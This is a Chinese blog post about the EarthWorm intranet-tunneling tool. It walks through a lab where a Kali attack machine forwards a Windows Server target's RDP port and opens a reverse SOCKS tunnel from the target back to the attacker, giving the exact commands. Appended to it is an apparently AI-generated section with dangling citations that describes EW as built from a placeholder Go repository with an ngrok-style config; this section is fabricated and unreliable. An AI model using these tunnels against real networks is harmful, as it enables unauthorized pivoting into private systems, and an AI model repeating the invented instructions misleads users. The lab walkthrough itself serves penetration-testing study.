内网穿透工具EW的简单使用(附内网环境实现)

本文介绍了EarthWorm(EW)工具的使用,包括其在Kali攻击机上对Windows 2008 R2目标服务器进行正向和反向连接的过程。正向连接通过Kali将目标服务器的3389端口转发到8888端口,反向连接则是目标机器向Kali的8888端口发起请求,实现网络穿透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透
EW可以已正向和方向以及多级级联的方式建立网络隧道
这里示范简单的正向以及反向是实现过程

实现环境

在这里插入图片描述

目标,使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接

过程

1.在EW工具包中,有很多版本,linux有32位的,以及64位的,首先我们需要输入以下命令来查看我们需要运行多少位的ew工具
file /bin/ls
在这里插入图片描述
发现我们是64位的,所以我们使用64位的EW
正向:
直接再kali攻击机中输入一下命令即可:
./ew_for_linux64 -s lcx_tran -l 8888 -f 192.168.206.129 -g 3389
以上意思是,将目标服务器的3389端口转发到我们攻击机的8888端口,然后访问攻击机的8888端口,即可连接目标服务器的3389端口
在这里插入图片描述
在这里插入图片描述
反向连接:
在kali攻击机中输入以下命令:
./ew_for_linux64 -s rcsocks -l 1008 -e 8888
在这里插入图片描述
以上的意思是,我们将向1008提出的请求转发到8888端口
然后,在目标机器上输入:
ew.exe -s rssocks 192.168.206.131 -e 8888
在这里插入图片描述
以上的意思是,开启socks服务,访问192.168.206.131的8888端口就可以进行目标机器(192.168.206.129)的socks服务,
出现以下字符显示成功
在这里插入图片描述

### 关于 EW 穿透命令及其内网映射或端口转发 EW 是一种常见的工具,用于实现内网穿透功能。它通过建立反向代理连接来完成外部网络访问内部服务的需求。以下是关于如何使用 `ew` 命令进行内网映射或端口转发的相关说明。 #### 工作原理概述 EW 的核心机制在于创建一条从目标服务器到本地机器之间的隧道[^1]。这条隧道允许远程客户端通过公 IP 或域名间接访问位于私有网络中的资源。具体来说,该过程涉及以下几个要素: - **客户端**:发起请求的一方。 - **中间服务器(中转节点)**:负责接收来自客户端的数据并将其传递给目标主机。 - **目标主机**:运行在局域内的实际提供服务的设备。 #### 配置方法与常用参数解析 要利用 ew 实现端口转发或者内网映射,通常需要执行如下操作: ##### 安装依赖环境 确保已安装必要的软件包以及支持的语言版本库。对于 Linux 平台而言,可能需要用到 Python 或者 Go 编译器等开发组件[^2]。 ```bash sudo apt-get update && sudo apt-get install python3-pip git -y pip3 install --upgrade pip setuptools wheel ``` ##### 下载并启动服务端程序 获取最新版源码文件后解压至指定目录下编译生成可执行二进制文件。 ```bash git clone https://github.com/your-repo-name.git /opt/ew-server/ cd /opt/ew-server/src/main/go/ go build main.go nohup ./main & ``` 上述脚本会克隆仓库地址并将项目放置于 `/opt/ew-server/` 路径下面;随后切换进入 go 子模块位置构建镜像最后以后台模式开启监听进程[^3]。 ##### 设置客户端链接选项 定义好相应的认证密钥之后即可尝试接入云端实例从而暴露隐藏的服务接口。 ```json { "ServerAddr": "0.tcp.ngrok.io:port_number", "TokenAuth": true, "LocalPort": 8080, "RemotePort": 9090 } ``` 在此 JSON 对象里包含了几个重要字段解释如下: - ServerAddr 表明远端开放的具体坐标信息; - TokenAuth 启用令牌验证保障安全性; - LocalPort 映射的是本地待共享的应用层协议号; - RemotePort 则指代对外宣称可用的位置编号[^4]。 当一切准备就绪时可以借助 curl 测试连通状况亦或是部署 web 页面供他人浏览查阅资料等内容。 --- ### 注意事项 由于涉及到网络安全方面的问题所以在实施过程中务必遵循相关法律法规并且采取适当措施保护个人隐私不受侵犯比如设置强密码定期更换账户权限最小化原则等等[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值